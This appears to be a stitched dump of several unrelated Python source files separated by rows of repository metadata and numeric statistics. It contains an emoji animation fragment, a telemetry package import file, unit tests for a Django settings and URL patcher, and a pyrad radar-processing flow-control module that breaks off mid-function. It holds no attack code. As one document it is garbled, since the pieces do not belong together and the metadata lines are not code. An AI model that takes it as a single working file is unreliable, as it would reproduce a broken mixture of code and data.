print("🌫🌫🌫🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌪🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🧯👩🚒 🧯👨🚒")
time.sleep(1)
| 17.844828
| 27
| 0.417391
| 175
| 1,035
| 3.76
| 0.154286
| 0.382979
| 0.319149
| 0.478723
| 0.727964
| 0.463526
| 0.31155
| 0.31155
| 0.31155
| 0.31155
| 0
| 0.034208
| 0.152657
| 1,035
| 58
| 28
| 17.844828
| 0.458381
| 0
| 0
| 0.719298
| 0
| 0
| 0.27477
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.017544
| 0
| 0.017544
| 0.491228
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c48c271670a6f96890a4bcf5c7863664bf8c97b2
| 110
|
py
|
Python
|
telemetry/loggers/__init__.py
|
trevorgrayson/telemetry
|
efeca1b2062f40a2557f2c030dc687f546f3c60b
|
[
"MIT"
] | 3
|
2020-03-20T20:04:37.000Z
|
2021-08-23T20:11:10.000Z
|
telemetry/loggers/__init__.py
|
trevorgrayson/telemetry
|
efeca1b2062f40a2557f2c030dc687f546f3c60b
|
[
"MIT"
] | 2
|
2019-06-10T08:02:05.000Z
|
2019-06-10T08:02:22.000Z
|
telemetry/loggers/__init__.py
|
trevorgrayson/telemetry
|
efeca1b2062f40a2557f2c030dc687f546f3c60b
|
[
"MIT"
] | null | null | null |
from telemetry.clients.pagerduty import PagerDutyTelemeter
from telemetry.clients.slack import SlackTelemeter
| 36.666667
| 58
| 0.890909
| 12
| 110
| 8.166667
| 0.666667
| 0.265306
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 110
| 2
| 59
| 55
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
484c22950d92c4719af57441dbe6aaf1bb31e0cb
| 15,382
|
py
|
Python
|
guitar-package/guitar/tests/patcher_test.py
|
django-stars/guitar
|
9bddfd2d7b555c97dd9470b458a5f43bd805b026
|
[
"MIT"
] | null | null | null |
guitar-package/guitar/tests/patcher_test.py
|
django-stars/guitar
|
9bddfd2d7b555c97dd9470b458a5f43bd805b026
|
[
"MIT"
] | null | null | null |
guitar-package/guitar/tests/patcher_test.py
|
django-stars/guitar
|
9bddfd2d7b555c97dd9470b458a5f43bd805b026
|
[
"MIT"
] | null | null | null |
import unittest
import shutil
import os
from guitar.patcher import Patcher, SettingsPatcher, MiddlewarePatcher, AppsPatcher, UrlsPatcher
class TestPatcher(unittest.TestCase):
settings_py_path = 'tests/settings_py_copy.txt'
settings_py_expect_path = 'tests/settings_py_expect.txt'
def setUp(self):
# Copy settings example
shutil.copy2('tests/settings_py.txt', self.settings_py_path)
def tearDown(self):
# Remove settings example
os.remove(self.settings_py_path)
def test_patcher(self):
patcher_obj = {
'settings': {
'file_path': self.settings_py_path,
'patch': {'item_to_add': "FOO='BAR'\nAPP_DATA = {'x': 5, 'y':['1','2','3']}"}
}
}
Patcher().patch(patcher_obj)
with open(self.settings_py_path, 'r') as f:
content = f.read()
with open(self.settings_py_expect_path, 'r') as f:
content_expect = f.read()
self.assertEqual(content_expect, content)
class TestPatchSettings(unittest.TestCase):
settings_py = """
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
settings_py_after_patch = """
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
FOO='BAR'
APP_DATA = {'x': 5, 'y':['1','2','3']}
"""
def test_patch_settings(self):
patch_obj = {'item_to_add': "FOO='BAR'\nAPP_DATA = {'x': 5, 'y':['1','2','3']}"}
new_settings_py = SettingsPatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(self.settings_py_after_patch, new_settings_py)
class TestMiddlewarePatcher(unittest.TestCase):
settings_py = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
def test_patch_after(self):
settings_py_append_after = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'foo.middleware.bar',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'before': None, 'after': 'django.middleware.csrf.CsrfViewMiddleware', 'item_to_add': 'foo.middleware.bar'}
new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_after, new_settings_py)
def test_append_before(self):
settings_py_append_before = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'foo.middleware.bar',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'after': None, 'before': 'django.middleware.csrf.CsrfViewMiddleware', 'item_to_add': 'foo.middleware.bar'}
new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
def test_append_first(self):
settings_py_append_before = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'foo.middleware.bar',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'after': None, 'before': 'django.middleware.common.CommonMiddleware', 'item_to_add': 'foo.middleware.bar'}
new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
def test_append_last(self):
settings_py_append_before = """
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'foo.middleware.bar',
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'before': None, 'after': 'django.contrib.messages.middleware.MessageMiddleware', 'item_to_add': 'foo.middleware.bar'}
new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
patch_obj = {'before': None, 'after': None, 'item_to_add': 'foo.middleware.bar'}
new_settings_py = MiddlewarePatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
class AppsTestPatcher(unittest.TestCase):
settings_py = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
def test_patch_after(self):
settings_py_append_after = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'foo.bar',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'before': None, 'after': 'django.contrib.sites', 'item_to_add': 'foo.bar'}
new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_after, new_settings_py)
def test_append_before(self):
settings_py_append_before = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'foo.bar',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'after': None, 'before': 'django.contrib.sites', 'item_to_add': 'foo.bar'}
new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
def test_append_first(self):
settings_py_append_before = """
INSTALLED_APPS = (
'foo.bar',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin'
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'after': None, 'before': 'django.contrib.auth', 'item_to_add': 'foo.bar'}
new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
def test_append_last(self):
settings_py_append_before = """
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'foo.bar',
)
ROOT_URLCONF = 'guitar.urls'
WSGI_APPLICATION = 'guitar.wsgi.application'
"""
patch_obj = {'before': None, 'after': 'django.contrib.admin', 'item_to_add': 'foo.bar'}
new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
patch_obj = {'before': None, 'after': None, 'item_to_add': 'foo.bar'}
new_settings_py = AppsPatcher().apply_patch(self.settings_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
class UrlsTestPatcher(unittest.TestCase):
urls_py = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""
def test_patch_after(self):
settings_py_append_after = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(_(r'^foo/'), include('foo.urls')),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""
patch_obj = {'before': None, 'after': '^admin/', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
new_urls_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
self.assertEqual(settings_py_append_after, new_urls_py)
def test_append_before(self):
urls_py_append_before = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(_(r'^foo/'), include('foo.urls')),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""
patch_obj = {'after': None, 'before': 'django.views.generic.simple.redirect_to', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
self.assertEqual(urls_py_append_before, new_settings_py)
def test_append_first(self):
settings_py_append_before = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(_(r'^foo/'), include('foo.urls')),
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls'))
)
"""
patch_obj = {'after': None, 'before': 'admin.site.urls', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
def test_append_last(self):
settings_py_append_before = """
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(
r'^admin/',
include(admin.site.urls)
),
url(
_(r'^branch/(?P<slug>[+\w\s-]+)/$'),
'ololo.views.trololo',
name='ololo-trololo'),
url(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to',
{'url': os.path.join(settings.STATIC_URL, 'i/favicon.ico')}),
url(_(r'^accounts/'), include('profiles.urls')),
url(_(r'^accounts/'), include('django.contrib.auth.urls')),
url(_(r'^foo/'), include('foo.urls')),
)
"""
patch_obj = {'before': None, 'after': 'django.contrib.auth.urls', 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
patch_obj = {'before': None, 'after': None, 'item_to_add': "url(_(r'^foo/'), include('foo.urls'))"}
new_settings_py = UrlsPatcher().apply_patch(self.urls_py, patch_obj)
self.assertEqual(settings_py_append_before, new_settings_py)
| 33.150862
| 144
| 0.690482
| 1,756
| 15,382
| 5.823462
| 0.071185
| 0.104244
| 0.038138
| 0.040876
| 0.912674
| 0.894778
| 0.887542
| 0.879718
| 0.875122
| 0.866419
| 0
| 0.001003
| 0.157197
| 15,382
| 463
| 145
| 33.222462
| 0.787797
| 0.002926
| 0
| 0.778947
| 0
| 0
| 0.658211
| 0.392005
| 0
| 0
| 0
| 0
| 0.044737
| 1
| 0.042105
| false
| 0
| 0.036842
| 0
| 0.110526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4851095d0bf0da7ca3630d8d44a7884f95b46325
| 34,846
|
py
|
Python
|
src/pyrad_proc/pyrad/flow/flow_control.py
|
MeteoSwiss/pyrad
|
f733179075fdf3fcff475a5af8b6b71e9ac4379d
|
[
"BSD-3-Clause"
] | 9
|
2021-02-22T15:34:37.000Z
|
2022-03-29T13:16:25.000Z
|
src/pyrad_proc/pyrad/flow/flow_control.py
|
MeteoSwiss/pyrad
|
f733179075fdf3fcff475a5af8b6b71e9ac4379d
|
[
"BSD-3-Clause"
] | 15
|
2021-02-08T10:16:41.000Z
|
2022-03-31T09:26:26.000Z
|
src/pyrad_proc/pyrad/flow/flow_control.py
|
MeteoSwiss/pyrad
|
f733179075fdf3fcff475a5af8b6b71e9ac4379d
|
[
"BSD-3-Clause"
] | 2
|
2021-02-08T09:44:40.000Z
|
2021-03-24T14:56:31.000Z
|
"""
pyrad.flow.flow_control
=======================
functions to control the Pyrad data processing flow
.. autosummary::
:toctree: generated/
main
main_rt
main_cosmo
main_cosmo_rt
main_gecsx
"""
from __future__ import print_function
import warnings
from warnings import warn
import traceback
import os
from datetime import datetime
from datetime import timedelta
import gc
import subprocess
import queue
import time
from pathlib import Path
from pyart import version as pyart_version
from pyrad import version as pyrad_version
from .flow_aux import _warning_format, _initialize_listener
from .flow_aux import _create_cfg_dict, _create_datacfg_dict
from .flow_aux import _get_times_and_traj, _get_datatype_list
from .flow_aux import _get_datasets_list, _get_masterfile_list
from .flow_aux import _wait_for_files, _get_radars_data
from .flow_aux import _initialize_datasets
from .flow_aux import _process_datasets, _postprocess_datasets
from ..io.io_aux import get_datetime
from ..io.read_data_other import read_last_state
from ..io.write_data import write_last_state
ALLOW_USER_BREAK = False
try:
import dask
from dask.diagnostics import Profiler, ResourceProfiler, CacheProfiler
from dask.diagnostics import visualize
from distributed import Client
from bokeh.io import export_png
_DASK_AVAILABLE = True
except ImportError:
warn('dask not available: The processing will not be parallelized')
_DASK_AVAILABLE = False
def main(cfgfile, starttime=None, endtime=None, trajfile="", trajtype='plane',
flashnr=0, infostr="", MULTIPROCESSING_DSET=False,
MULTIPROCESSING_PROD=False, PROFILE_MULTIPROCESSING=False,
USE_CHILD_PROCESS=False):
"""
Main flow control. Processes radar data off-line over a period of time
given either by the user, a trajectory file, or determined by the last
volume processed and the current time. Multiple radars can be processed
simultaneously
Parameters
----------
cfgfile : str
path of the main config file
starttime, endtime : datetime object
start and end time of the data to be processed
trajfile : str
path to file describing the trajectory
trajtype : str
type of trajectory file. Can be either 'plane', 'lightning' or
'proc_periods'
flashnr : int
If larger than 0 will select a flash in a lightning trajectory file.
If 0 the data corresponding to the trajectory of all flashes will be
plotted
infostr : str
Information string about the actual data processing
(e.g. 'RUN57'). This string is added to product files.
MULTIPROCESSING_DSET : Bool
If true the generation of datasets at the same processing level will
be parallelized
MULTIPROCESSING_PROD : Bool
If true the generation of products from each dataset will be
parallelized
PROFILE_MULTIPROCESSING : Bool
If true and code parallelized the multiprocessing is profiled
USE_CHILD_PROCESS : Bool
If true the reading and processing of the data will be performed by
a child process controlled by dask. This is done to make sure all
memory used is released.
"""
print("- PYRAD version: {} (compiled {} by {})".format(
pyrad_version.version, pyrad_version.compile_date_time,
pyrad_version.username))
print("- PYART version: {}".format(pyart_version.version))
# Define behaviour of warnings
warnings.simplefilter('always') # always print matching warnings
# warnings.simplefilter('error') # turn matching warnings into exceptions
warnings.formatwarning = _warning_format # define format
if ALLOW_USER_BREAK:
input_queue = _initialize_listener()
if not _DASK_AVAILABLE:
MULTIPROCESSING_DSET = False
MULTIPROCESSING_PROD = False
PROFILE_MULTIPROCESSING = False
USE_CHILD_PROCESS = False
# check if multiprocessing profiling is necessary
if (not MULTIPROCESSING_DSET and not MULTIPROCESSING_PROD and
not USE_CHILD_PROCESS):
PROFILE_MULTIPROCESSING = False
elif (int(MULTIPROCESSING_DSET)+int(MULTIPROCESSING_PROD) +
int(USE_CHILD_PROCESS) > 1):
PROFILE_MULTIPROCESSING = False
if (int(MULTIPROCESSING_DSET)+int(MULTIPROCESSING_PROD) +
int(USE_CHILD_PROCESS) > 1):
# necessary to launch tasks from tasks
Client()
if PROFILE_MULTIPROCESSING:
prof = Profiler()
rprof = ResourceProfiler()
cprof = CacheProfiler()
prof.register()
rprof.register()
cprof.register()
cfg = _create_cfg_dict(cfgfile)
datacfg = _create_datacfg_dict(cfg)
starttimes, endtimes, traj = _get_times_and_traj(
trajfile, starttime, endtime, cfg['ScanPeriod'],
last_state_file=cfg['lastStateFile'], trajtype=trajtype,
flashnr=flashnr)
if infostr:
print('- Info string : {}'.format(infostr))
# get data types and levels
datatypesdescr_list = list()
for i in range(1, cfg['NumRadars']+1):
datatypesdescr_list.append(
_get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))
dataset_levels = _get_datasets_list(cfg)
masterfilelist, masterdatatypedescr, masterscan = _get_masterfile_list(
datatypesdescr_list[0], starttimes, endtimes, datacfg,
scan_list=datacfg['ScanList'])
nvolumes = len(masterfilelist)
if nvolumes == 0:
raise ValueError(
"ERROR: Could not find any valid volumes between "
"{} and {} for master scan '{}' and master data type '{}'".format(
starttimes[0].strftime('%Y-%m-%d %H:%M:%S'),
endtimes[-1].strftime('%Y-%m-%d %H:%M:%S'), masterscan,
masterdatatypedescr))
print('- Number of volumes to process: {}'.format(nvolumes))
print('- Start time: {}'.format(
starttimes[0].strftime("%Y-%m-%d %H:%M:%S")))
print('- end time: {}'.format(endtimes[-1].strftime("%Y-%m-%d %H:%M:%S")))
# initial processing of the datasets
print('\n\n- Initializing datasets:')
dscfg, traj = _initialize_datasets(
dataset_levels, cfg, traj=traj, infostr=infostr)
# process all data files in file list or until user interrupts processing
for masterfile in masterfilelist:
if ALLOW_USER_BREAK:
# check if user has requested exit
try:
input_queue.get_nowait()
warn('Program terminated by user')
break
except queue.Empty:
pass
print('\n- master file: {}'.format(os.path.basename(masterfile)))
master_voltime = get_datetime(masterfile, masterdatatypedescr)
if USE_CHILD_PROCESS:
data_reading = dask.delayed(_get_radars_data)(
master_voltime, datatypesdescr_list, datacfg,
num_radars=datacfg['NumRadars'])
try:
radar_list = data_reading.compute()
del data_reading
dscfg_aux = dask.delayed(dscfg)
traj_aux = dask.delayed(traj)
data_processing = dask.delayed(_process_datasets)(
dataset_levels, cfg, dscfg_aux, radar_list,
master_voltime, traj=traj_aux, infostr=infostr,
MULTIPROCESSING_DSET=MULTIPROCESSING_DSET,
MULTIPROCESSING_PROD=MULTIPROCESSING_PROD)
try:
dscfg, traj = data_processing.compute()
del data_processing
del radar_list
del dscfg_aux
del traj_aux
except Exception as ee:
warn(str(ee))
traceback.print_exc()
except Exception as ee:
warn(str(ee))
traceback.print_exc()
else:
radar_list = _get_radars_data(
master_voltime, datatypesdescr_list, datacfg,
num_radars=datacfg['NumRadars'])
# process all data sets
dscfg, traj = _process_datasets(
dataset_levels, cfg, dscfg, radar_list, master_voltime, traj=traj,
infostr=infostr, MULTIPROCESSING_DSET=MULTIPROCESSING_DSET,
MULTIPROCESSING_PROD=MULTIPROCESSING_PROD)
# delete variables
del radar_list
gc.collect()
# post-processing of the datasets
print('\n\n- Post-processing datasets:')
dscfg, traj = _postprocess_datasets(
dataset_levels, cfg, dscfg, traj=traj, infostr=infostr)
if PROFILE_MULTIPROCESSING:
prof.unregister()
rprof.unregister()
cprof.unregister()
bokeh_plot = visualize([prof, rprof, cprof], show=False, save=False)
profile_path = os.path.expanduser('~')+'/profiling/'
if not os.path.isdir(profile_path):
os.makedirs(profile_path)
export_png(bokeh_plot, filename=(
profile_path+datetime.utcnow().strftime('%Y%m%d%H%M%S') +
'_profile.png'))
print('- This is the end my friend! See you soon!')
def main_rt(cfgfile_list, starttime=None, endtime=None, infostr_list=None,
proc_period=60, proc_finish=None):
"""
main flow control. Processes radar data in real time. The start and end
processing times can be determined by the user. This function is inteded
for a single radar
Parameters
----------
cfgfile_list : list of str
path of the main config files
starttime, endtime : datetime object
start and end time of the data to be processed
infostr_list : list of str
Information string about the actual data processing
(e.g. 'RUN57'). This string is added to product files.
proc_period : int
period of time before starting a new processing round (seconds)
proc_finish : int or None
if set to a value the program will be forced to shut down after the
value (in seconds) from start time has been exceeded
Returns
-------
end_proc : Boolean
If true the program has ended successfully
"""
print("- PYRAD version: %s (compiled %s by %s)" %
(pyrad_version.version, pyrad_version.compile_date_time,
pyrad_version.username))
print("- PYART version: " + pyart_version.version)
# Define behaviour of warnings
warnings.simplefilter('always') # always print matching warnings
# warnings.simplefilter('error') # turn matching warnings into exceptions
warnings.formatwarning = _warning_format # define format
# The processing will be allowed to run for a limited period
if proc_finish is not None:
startime_proc = datetime.utcnow()
# for offline testing
# startime_proc = startime_proc.replace(
# year=endtime.year, month=endtime.month, day=endtime.day)
# startime_proc = startime_proc.replace(hour=10)
endtime_proc = startime_proc+timedelta(seconds=proc_finish)
if ALLOW_USER_BREAK:
input_queue = _initialize_listener()
cfg_list = []
datacfg_list = []
dscfg_list = []
datatypesdescr_list_list = []
dataset_levels_list = []
last_processed_list = []
for icfg, cfgfile in enumerate(cfgfile_list):
cfg = _create_cfg_dict(cfgfile)
if infostr_list is not None:
infostr = infostr_list[icfg]
else:
infostr = ""
datacfg = _create_datacfg_dict(cfg)
if infostr:
print('- Info string : ' + infostr)
# find out last processed volume
last_processed = read_last_state(cfg['lastStateFile'])
if last_processed is None:
print('- last processed volume unknown')
else:
print('- last processed volume: '+last_processed.strftime(
'%Y%m%d%H%M%S'))
last_processed_list.append(last_processed)
# get data types and levels
datatypesdescr_list = list()
for i in range(1, cfg['NumRadars']+1):
datatypesdescr_list.append(
_get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))
dataset_levels = _get_datasets_list(cfg)
# initial processing of the datasets
print('\n\n- Initializing datasets:')
dscfg, traj = _initialize_datasets(
dataset_levels, cfg, infostr=infostr)
cfg_list.append(cfg)
datacfg_list.append(datacfg)
dscfg_list.append(dscfg)
datatypesdescr_list_list.append(datatypesdescr_list)
dataset_levels_list.append(dataset_levels)
# remove variables from memory
del cfg
del datacfg
del dscfg
del datatypesdescr_list
del dataset_levels
del last_processed
del traj
gc.collect()
end_proc = False
while not end_proc:
if ALLOW_USER_BREAK:
# check if user has requested exit
try:
user_input = input_queue.get_nowait()
end_proc = user_input
warn('Program terminated by user')
break
except queue.Empty:
pass
nowtime = datetime.utcnow()
# for offline testing
# nowtime = nowtime.replace(
# year=endtime.year, month=endtime.month, day=endtime.day)
# nowtime = nowtime.replace(hour=10)
# if processing end time exceeded finalize processing
if proc_finish is not None:
if nowtime >= endtime_proc:
end_proc = True
warn('Allowed processing time exceeded')
break
# end time has been set and current time older than end time
# quit processing
if endtime is not None:
if nowtime > endtime:
end_proc = True
break
# start time has been set. Check if current time has to be
# processed. If not sleep until next proc_period
if starttime is not None:
if nowtime < starttime:
time.sleep(proc_period)
continue
vol_processed = False
for icfg, cfg in enumerate(cfg_list):
if ALLOW_USER_BREAK:
# check if user has requested exit
try:
user_input = input_queue.get_nowait()
end_proc = user_input
warn('Program terminated by user')
break
except queue.Empty:
pass
datacfg = datacfg_list[icfg]
dscfg = dscfg_list[icfg]
datatypesdescr_list = datatypesdescr_list_list[icfg]
dataset_levels = dataset_levels_list[icfg]
last_processed = last_processed_list[icfg]
if infostr_list is not None:
infostr = infostr_list[icfg]
else:
infostr = ""
# wait until new files are available
masterfile, masterdatatypedescr, last_processed = _wait_for_files(
nowtime, datacfg, datatypesdescr_list[0],
last_processed=last_processed)
if masterfile is None:
last_processed_list[icfg] = last_processed
if last_processed is not None:
write_last_state(last_processed, cfg['lastStateFile'])
continue
print('\n- master file: ' + os.path.basename(masterfile))
master_voltime = get_datetime(masterfile, masterdatatypedescr)
# get data of master radar
radar_list = _get_radars_data(
master_voltime, datatypesdescr_list, datacfg)
# process all data sets
dscfg, traj = _process_datasets(
dataset_levels, cfg, dscfg, radar_list, master_voltime,
infostr=infostr)
last_processed_list[icfg] = master_voltime
